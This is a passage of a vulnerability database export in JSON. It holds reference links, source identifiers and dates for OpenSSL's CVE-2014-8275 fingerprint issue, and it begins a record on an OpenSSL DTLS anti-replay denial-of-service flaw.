"trust": 0.8, "url": "https://github.com/openssl/openssl/commit/684400ce192dac51df3d3e92b61830a6ef90be3e" }, { "title": "HPSBHF03289", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04602055" }, { "title": "HPSBUX03244 SSRT101885", "trust": 0.8, "url": "http://h20565.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04556853\u0026lang=en\u0026cc=us" }, { "title": "HPSBGN03299", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04604357" }, { "title": "NV15-017", "trust": 0.8, "url": "http://jpn.nec.com/security-info/secinfo/nv15-017.html" }, { "title": "Certificate fingerprints can be modified (CVE-2014-8275)", "trust": 0.8, "url": "https://www.openssl.org/news/secadv_20150108.txt" }, { "title": "Oracle Critical Patch Update Advisory - July 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "title": "Oracle Critical Patch Update Advisory - July 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html" }, { "title": "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html" }, { "title": "Text Form of Oracle Critical Patch Update - July 2015 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2015verbose-2367947.html" }, { "title": "Oracle Critical Patch Update Advisory - April 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html" }, { "title": "Text Form of Oracle Critical Patch Update - April 2015 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2015verbose-2365613.html" }, { "title": "Oracle Critical Patch Update Advisory - October 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html" }, { "title": "Text Form of Oracle Critical Patch Update - October 2015 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2015verbose-2367954.html" }, { "title": "Oracle Third Party Bulletin - January 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2015-2370101.html" }, { "title": "RHSA-2015:0066", "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2015-0066.html" }, { "title": "RHSA-2015:0800", "trust": 0.8, "url": "http://rhn.redhat.com/errata/rhsa-2015-0800.html" }, { "title": "October 2015 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/october_2015_critical_patch_update" }, { "title": "July 2016 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update" }, { "title": "July 2015 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/july_2015_critical_patch_update" }, { "title": "April 2015 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/april_2015_critical_patch_update" }, { "title": "cisco-sa-20150310-ssl", "trust": 0.8, "url": "http://www.cisco.com/cisco/web/support/jp/112/1128/1128755_cisco-sa-20150310-ssl-j.html" }, { "title": "\u682a\u5f0f\u4f1a\u793e\u30d0\u30c3\u30d5\u30a1\u30ed\u30fc \u306e\u544a\u77e5\u30da\u30fc\u30b8", "trust": 0.8, "url": "http://buffalo.jp/support_s/s20150327b.html" }, { "title": "TLSA-2015-2", "trust": 0.8, "url": "http://www.turbolinux.co.jp/security/2015/tlsa-2015-2j.html" }, { "title": "Red Hat: Moderate: openssl security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20150066 - security advisory" }, { "title": "Red Hat: CVE-2014-8275", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2014-8275" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2459-1" }, { "title": "Debian Security Advisories: DSA-3125-1 openssl -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=a3210fee56d96657bbff4ad44c3d0807" }, { "title": "Amazon Linux AMI: ALAS-2015-469", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2015-469" }, { "title": "Symantec Security Advisories: SA88 : OpenSSL Security Advisory 08-Jan-2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=9281dc3b1a760e1cf2711cdf82cf64d7" }, { "title": "Apple: OS X Yosemite v10.10.3 and Security Update 2015-004", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=aa5ab46566482c02434bb8cf65c9614e" }, { "title": "Cisco: Multiple Vulnerabilities in OpenSSL (January 2015) Affecting Cisco Products", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20150310-ssl" }, { "title": "Tenable Security Advisories: [R6] OpenSSL \u002720150319\u0027 Advisory Affects Tenable Products", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2015-04" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4b527561ba1a5de7a529c8a93679f585" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=744c19dc9f4f70ad58059bf8733ec9c1" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - January 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=eaf98750f1130c39e83765575c69e165" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a" }, { "title": "Citrix Security Bulletins: Multiple Security Vulnerabilities in Citrix NetScaler Platform IPMI Lights Out Management (LOM) firmware", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=eb059834b7f24e2562bcf592b6d0afbc" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=459961024c4bdce7bb3a1a40a65a6f2e" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=3a04485ebb79f7fbc2472bf9af5ce489" }, { "title": "JPN_RIC13351-2", "trust": 0.1, "url": "https://github.com/neominds/jpn_ric13351-2 " } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-8275" }, { "db": "JVNDB", "id": "JVNDB-2014-007554" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-310", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-007554" }, { "db": "NVD", "id": "CVE-2014-8275" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.7, "url": "https://www.openssl.org/news/secadv_20150108.txt" }, { "trust": 1.4, "url": "https://github.com/openssl/openssl/commit/cb62ab4b17818fe66d2fed0a7fe71969131c811b" }, { "trust": 1.4, "url": "https://github.com/openssl/openssl/commit/684400ce192dac51df3d3e92b61830a6ef90be3e" }, { "trust": 1.4, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20150310-ssl" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "trust": 1.4, "url": "https://bto.bluecoat.com/security-advisory/sa88" }, { "trust": 1.4, "url": "https://support.citrix.com/article/ctx216642" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2015-0066.html" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2015-0800.html" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-january/148363.html" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:019" }, { "trust": 1.1, "url": "http://www.debian.org/security/2015/dsa-3125" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142496289803847\u0026w=2" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-01/msg00021.html" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142720981827617\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142721102728110\u0026w=2" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-03/msg00027.html" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:062" }, { "trust": 1.1, "url": "http://lists.apple.com/archives/security-announce/2015/apr/msg00001.html" }, { "trust": 1.1, "url": "https://support.apple.com/ht204659" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00026.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144050297101809\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144050254401665\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=143748090628601\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144050155601375\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142895206924048\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144050205101530\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142496179803395\u0026w=2" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2015-2370101.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00011.html" }, { "trust": 1.1, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10679" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1033378" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00037.html" }, { "trust": 1.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10108" }, { "trust": 1.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10102" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/71935" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "trust": 0.9, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8275" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0204" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8275" }, { "trust": 0.8, "url": "https://jvn.jp/vu/jvnvu98974537/index.html" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu91828320/index.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8275" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3572" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3570" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3571" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3569" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0205" }, { "trust": 0.6, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.6, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0206" }, { "trust": 0.4, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04765169" }, { "trust": 0.4, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2014-8275" }, { "trust": 0.3, "url": "https://github.com/openssl/openssl/commit/ec2fede9467ae1a65f452d3a39f7fbc4891d9285" }, { "trust": 0.3, "url": "https://github.com/openssl/openssl/commit/a8565530e27718760220df469f0a071c85b9e731" }, { "trust": 0.3, "url": "http://www.pexip.com/sites/pexip/files/pexip_security_bulletin_2015-01-30.pdf" }, { "trust": 0.3, "url": "http://www.openssl.org" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699883" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699667" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/feb/160" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10679\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/101010782" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04746490" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04602055" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04765115" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04774019" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04774021" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21698818" }, { "trust": 0.3, "url": "https://aix.software.ibm.com/aix/efixes/security/openssl_advisory12.asc" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699271" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/101008182" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/101011698" }, { "trust": 0.3, "url": "https://www.openssl.org/news/vulnerabilities.html#2014-3571" }, { "trust": 0.3, "url": "https://www.alienvault.com/forums/discussion/4475/security-advisory-alienvault-v4-15-1-addresses-twenty-20-vulnerabilities" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21963783" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098593" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903299" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022575" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005159" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21700275" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699938" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097733" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005170" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097503" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883287" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097811" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097504" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902694" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902277" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21697291" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903726" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097796" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21697162" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097823" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21700411" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005150" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1009328" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21695985" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022074" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21701453" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21694849" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097360" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21698506" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699810" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699069" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0288" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0209" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0286" }, { "trust": 0.2, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0287" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-0204" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0289" }, { "trust": 0.2, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.2, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.2, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0207" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0118" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8142" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0226" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0231" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3523" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0285" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9653" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9705" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0232" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9427" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0208" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0273" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0231" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9652" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/310.html" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2015:0066" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2459-1/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5432" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5433" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0235" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all-" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all-" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/5.1/service_packs/security-sp-2.1-all-" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.1-all-" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/5.0/service_packs/security-sp-2.1-all-" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all-" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/softpaq/sp70501-71000/sp70649.exe" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.0-all-" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/1384453" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-0288" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-0292" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0292" }, { "trust": 0.1, "url": "https://www.openssl.org/news/secadv_20150319.txt" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0293" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-0293" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-0287" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-0289" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0204" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3570" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/advisories/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3571" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0206" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0205" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3572" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3569" }, { "trust": 0.1, "url": "https://h20566.www2.hp.com/portal/site/hpsc/patch/home" }, { "trust": 0.1, "url": "http://h71000.www7.hp.com/openvms/products/ssl/ssl.html" }, { "trust": 0.1, "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04746490\u0026la" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-1692" }, { "trust": 0.1, "url": "http://www.hp.com/go/insightupdates" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0248" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-5107" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04762744" }, { "trust": 0.1, "url": "http://www.hp.com/go/smh" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-0206" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-0205" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-3572" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-3571" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-3570" }, { "trust": 0.1, "url": "https://h20392.www2.hp.com/portal/swdepot/displayproductinfo.do?productnumber" }, { "trust": 0.1, "url": "https://www.hp.com/go/swa" } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-8275" }, { "db": "BID", "id": "71935" }, { "db": "JVNDB", "id": "JVNDB-2014-007554" }, { "db": "PACKETSTORM", "id": "133317" }, { "db": "PACKETSTORM", "id": "130987" }, { "db": "PACKETSTORM", "id": "131387" }, { "db": "PACKETSTORM", "id": "129870" }, { "db": "PACKETSTORM", "id": "131408" }, { "db": "PACKETSTORM", "id": "133325" }, { "db": "PACKETSTORM", "id": "132763" }, { "db": "PACKETSTORM", "id": "130051" }, { "db": "PACKETSTORM", "id": "130545" }, { "db": "NVD", "id": "CVE-2014-8275" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2014-8275" }, { "db": "BID", "id": "71935" }, { "db": "JVNDB", "id": "JVNDB-2014-007554" }, { "db": "PACKETSTORM", "id": "133317" }, { "db": "PACKETSTORM", "id": "130987" }, { "db": "PACKETSTORM", "id": "131387" }, { "db": "PACKETSTORM", "id": "129870" }, { "db": "PACKETSTORM", "id": "131408" }, { "db": "PACKETSTORM", "id": "133325" }, { "db": "PACKETSTORM", "id": "132763" }, { "db": "PACKETSTORM", "id": "130051" }, { "db": "PACKETSTORM", "id": "130545" }, { "db": "NVD", "id": "CVE-2014-8275" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-01-09T00:00:00", "db": "VULMON", "id": "CVE-2014-8275" }, { "date": "2015-01-08T00:00:00", "db": "BID", "id": "71935" }, { "date": "2015-01-13T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-007554" }, { "date": "2015-08-26T01:33:18", "db": "PACKETSTORM", "id": "133317" }, { "date": "2015-03-24T17:05:09", "db": "PACKETSTORM", "id": "130987" }, { "date": "2015-04-13T14:03:56", "db": "PACKETSTORM", "id": "131387" }, { "date": "2015-01-09T17:43:35", "db": "PACKETSTORM", "id": "129870" }, { "date": "2015-04-14T18:54:44", "db": "PACKETSTORM", "id": "131408" }, { "date": "2015-08-26T01:35:08", "db": "PACKETSTORM", "id": "133325" }, { "date": "2015-07-21T13:37:51", "db": "PACKETSTORM", "id": "132763" }, { "date": "2015-01-22T01:35:41", "db": "PACKETSTORM", "id": "130051" }, { "date": "2015-02-26T17:13:09", "db": "PACKETSTORM", "id": "130545" }, { "date": "2015-01-09T02:59:09.413000", "db": "NVD", "id": "CVE-2014-8275" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-11-15T00:00:00", "db": "VULMON", "id": "CVE-2014-8275" }, { "date": "2017-01-23T00:09:00", "db": "BID", "id": "71935" }, { "date": "2016-08-09T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-007554" }, { "date": "2017-11-15T02:29:05.437000", "db": "NVD", "id": "CVE-2014-8275" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "local", "sources": [ { "db": "BID", "id": "71935" } ], "trust": 0.3 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL Vulnerable to breaking fingerprint-based authentication blacklist protection mechanism", "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-007554" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Design Error", "sources": [ { "db": "BID", "id": "71935" } ], "trust": 0.3 } }
var-201609-0596
Vulnerability from variot
The Anti-Replay feature in the DTLS implementation in OpenSSL before 1.1.0 mishandles early use of a new epoch number in conjunction with a large sequence number, which allows remote attackers to cause a denial of service (false-positive packet drops) via spoofed DTLS records, related to rec_layer_d1.c and ssl3_record.c. OpenSSL is prone to denial-of-service vulnerability. An attacker may exploit this issue to cause a denial-of-service condition. Versions prior to OpenSSL 1.1.0 are vulnerable. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
